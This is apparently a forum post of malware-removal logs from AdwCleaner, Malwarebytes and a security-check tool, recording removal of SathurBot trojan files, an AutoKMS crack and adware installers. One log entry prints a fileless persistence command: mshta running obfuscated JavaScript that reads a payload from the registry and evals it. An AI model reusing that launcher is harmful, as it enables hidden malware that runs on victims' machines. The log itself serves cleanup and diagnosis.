All the required logs uploaded.
# AdwCleaner v5.201 - Logfile created 20/07/2016 at 15:20:46
# Updated 30/06/2016 by ToolsLib
# Database : 2016-07-19.2 [Server]
# Operating system : Windows 10 Home Single Language (X64)
# Username : Rehan - ADMIN
# Running from : C:\Users\Rehan\Downloads\adwcleaner_5.201.exe
# Option : Scan
# Support :
https://toolslib.net/forum***** [ Services ] *****
***** [ Folders ] *****
***** [ Files ] *****
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Shortcuts ] *****
***** [ Scheduled tasks ] *****
***** [ Registry ] *****
***** [ Web browsers ] *****
*************************
C:\AdwCleaner\AdwCleaner[S1].txt - [641 bytes] - [20/07/2016 15:20:46]
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [713 bytes] ##########
<?xml version="1.0" encoding="UTF-16" ?>
<mbam-log>
<header>
<date>2016/07/20 15:30:37 +0530</date>
<logfile>mbam-log-2016-07-20 (15-30-03).xml</logfile>
<isadmin>yes</isadmin>
</header>
<engine>
<version>2.2.1.1043</version>
<malware-database>v2016.07.20.06</malware-database>
<rootkit-database>v2016.05.27.01</rootkit-database>
<license>trial</license>
<file-protection>enabled</file-protection>
<web-protection>enabled</web-protection>
<self-protection>disabled</self-protection>
</engine>
<system>
<hostname>ADMIN</hostname>
<ip>192.168.43.143</ip>
<osversion>Windows 10</osversion>
<arch>x64</arch>
<username>Rehan</username>
<filesys>NTFS</filesys>
</system>
<summary>
<type>threat</type>
<result>completed</result>
<objects>304475</objects>
<time>407</time>
<processes>0</processes>
<modules>0</modules>
<keys>3</keys>
<values>1</values>
<datas>0</datas>
<folders>5</folders>
<files>20</files>
<sectors>0</sectors>
</summary>
<options>
<memory>enabled</memory>
<startup>enabled</startup>
<filesystem>enabled</filesystem>
<archives>enabled</archives>
<rootkits>disabled</rootkits>
<deeprootkit>disabled</deeprootkit>
<heuristics>enabled</heuristics>
<pup>enabled</pup>
<pum>enabled</pum>
</options>
<items>
<key><path>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SppExtComObj.exe</path><vendor>HackTool.AutoKMS</vendor><action>success</action><hash>6cda33f3bae0e6508919e40cd130d22e</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SppExtComObj.exe</path><vendor>HackTool.AutoKMS</vendor><action>success</action><hash>6cda33f3bae0e6508919e40cd130d22e</hash></key>
<key><path>HKU\S-1-5-21-3402600939-4254193186-2331665615-1001_Classes\651043\SHELL\OPEN\COMMAND</path><vendor>Rootkit.Fileless.MTGen</vendor><action>success</action><hash>5de9f1356d2d7eb85fe304fa937040c0</hash></key>
<value><path>HKU\S-1-5-21-3402600939-4254193186-2331665615-1001_Classes\651043\SHELL\OPEN\COMMAND</path><valuename></valuename><vendor>Rootkit.Fileless.MTGen</vendor><action>success</action><valuedata>"C:\WINDOWS\system32\mshta.exe" "javascript:rdu1J2TsG="BhKjwT";t0v5=new ActiveXObject("WScript.Shell");vxW3Z="cGqCgT6";noQ0D6=t0v5.RegRead("HKCU\\software\\yqsgon\\hdfdvz");uV8eDSk1="neCgvCgP";eval(noQ0D6);y3VwqzhN="bSoPcA";"</valuedata><hash>5de9f1356d2d7eb85fe304fa937040c0</hash></value>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\temp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<file><path>C:\Program Files (x86)\Cities XXL\steam_api.dll</path><vendor>RiskWare.GameHack</vendor><action>success</action><hash>4afc022406941a1cb2ba52566b9926da</hash></file>
<file><path>C:\Windows\System32\SppExtComObjPatcher.exe</path><vendor>HackTool.AutoKMS</vendor><action>success</action><hash>6cda33f3bae0e6508919e40cd130d22e</hash></file>
<file><path>C:\Users\Rehan\AppData\Local\Temp\ICReinstall_WinRAR_Setup.exe</path><vendor>PUP.Optional.InstallCore</vendor><action>success</action><hash>f94d0b1b2f6bf6402859084b2cd4fd03</hash></file>
<file><path>C:\Users\Rehan\AppData\Local\Temp\ins9D39.tmp</path><vendor>Trojan.Sathurbot</vendor><action>success</action><hash>af979294900ab77fa481c4f130d443bd</hash></file>
<file><path>C:\Users\Rehan\AppData\Local\Temp\Temp2_WinRAR_Setup.zip\WinRAR_Setup.exe</path><vendor>PUP.Optional.InstallCore</vendor><action>success</action><hash>58ee81a5990134020879ec67ea163ac6</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\zepplauncher.mif</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp3BF8.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6CCB.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6E74.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp7709.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp8388.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp8A9C.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpA089.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpB630.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpE20B.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpF22C.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{3E68883A-E05B-8A20-EE6E-AA5BF6EE8ED7}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{68E037CE-7737-AC9B-1D5A-84BC1EAA7F3E}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{BA281C97-4445-CB4F-B3EE-177BB951AD13}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{FCAD63A7-4785-E81C-0BEC-612D62B3C8C8}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
</items>
</mbam-log>
Results of screen317's Security Check version 1.014 --- 12/23/15
x64 (UAC is enabled)
Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````[/u]
Windows Firewall Enabled!
Windows Defender
McAfee Anti-Virus and Anti-Spyware
WMI entry may not exist for antivirus; attempting automatic update. `````````Anti-malware/Other Utilities Check:`````````[/u]
Google Chrome (51.0.2704.103)
Google Chrome (51.0.2704.84)
Google Chrome (SetupMetrics.pma..)
````````Process Check: objlist.exe by Laurent````````[/u]
Malwarebytes Anti-Malware mbamservice.exe
Malwarebytes Anti-Malware mbam.exe
Malwarebytes Anti-Malware mbamscheduler.exe
`````````````````System Health check`````````````````[/u]
Total Fragmentation on Drive C: %
````````````````````End of Log``````````````````````[/u]
[attachment deleted by admin to conserve space]